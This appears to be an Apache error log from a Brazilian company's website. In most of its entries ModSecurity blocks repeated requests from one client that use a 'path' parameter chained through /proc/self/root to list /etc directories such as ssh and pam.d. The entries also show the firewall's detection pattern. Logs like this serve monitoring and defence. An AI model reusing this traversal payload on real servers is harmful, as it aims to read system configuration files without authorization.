https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:05:51.861688 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.241.31:58246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmD6t8Nd0UC_OcbVHWiAAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:00.505973 2026] [:error] [pid 25581:tid 140411565680384] [client 74.7.241.31:58262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmFxLxOFNDSaSvJXBXtgAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:05.129795 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:06:07.475505 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.241.31:56890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmH7-sgTmmJoPuMdzC7wAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:09.342800 2026] [:error] [pid 25581:tid 140411565680384] [client 74.7.241.31:53816] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmIRLxOFNDSaSvJXBXuQAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:10.699362 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.31:53826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmIgeiSKl8TjouI-YlJQAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:12.186117 2026] [:error] [pid 25581:tid 140411548894976] [client 74.7.241.31:53830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmJBLxOFNDSaSvJXBXuwAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:13.843033 2026] [:error] [pid 25048:tid 140411565680384] [client 74.7.241.31:53846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmJXXXq9-mGshjHG3NYAAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:15.166976 2026] [:error] [pid 25581:tid 140411708356352] [client 74.7.241.31:53862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmJxLxOFNDSaSvJXBXvAAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:16.526544 2026] [:error] [pid 9299:tid 140411548894976] [client 74.7.241.31:53866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmKL-sgTmmJoPuMdzC9AAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:17.987564 2026] [:error] [pid 9299:tid 140411632822016] [client 74.7.241.31:50250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmKb-sgTmmJoPuMdzC9QAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:20.042100 2026] [:error] [pid 25836:tid 140411666392832] [client 74.7.241.31:50256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmK4h-PF_25v4hFRB35AAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:23.939463 2026] [:error] [pid 9299:tid 140411548894976] [client 74.7.241.31:50270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmL7-sgTmmJoPuMdzC9gAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:25.988428 2026] [:error] [pid 25581:tid 140411557287680] [client 74.7.241.31:50282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmMRLxOFNDSaSvJXBXvgAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:27.799221 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:35862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmM9Y0UrI5A3LftIwKTwAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:28.138493 2026] [proxy_fcgi:error] [pid 18380:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33136] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:06:29.639542 2026] [:error] [pid 25048:tid 140411624429312] [client 74.7.241.31:35864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmNXXXq9-mGshjHG3NZgAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:34.927126 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:35868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmOta6ubjKNq_cu4YUxwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:36.315050 2026] [:error] [pid 9299:tid 140411540502272] [client 74.7.241.31:35880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmPL-sgTmmJoPuMdzC9wAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:37.585445 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.241.31:56540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmPb-sgTmmJoPuMdzC_QAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:38.957681 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.241.31:56544] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmPnIk7brgkOH-rIWYYwAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:40.274972 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:56556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmQNY0UrI5A3LftIwKUgAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:41.567354 2026] [:error] [pid 6296:tid 140411540502272] [client 74.7.241.31:56570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmQXIk7brgkOH-rIWYaQAAAVg"], referer: 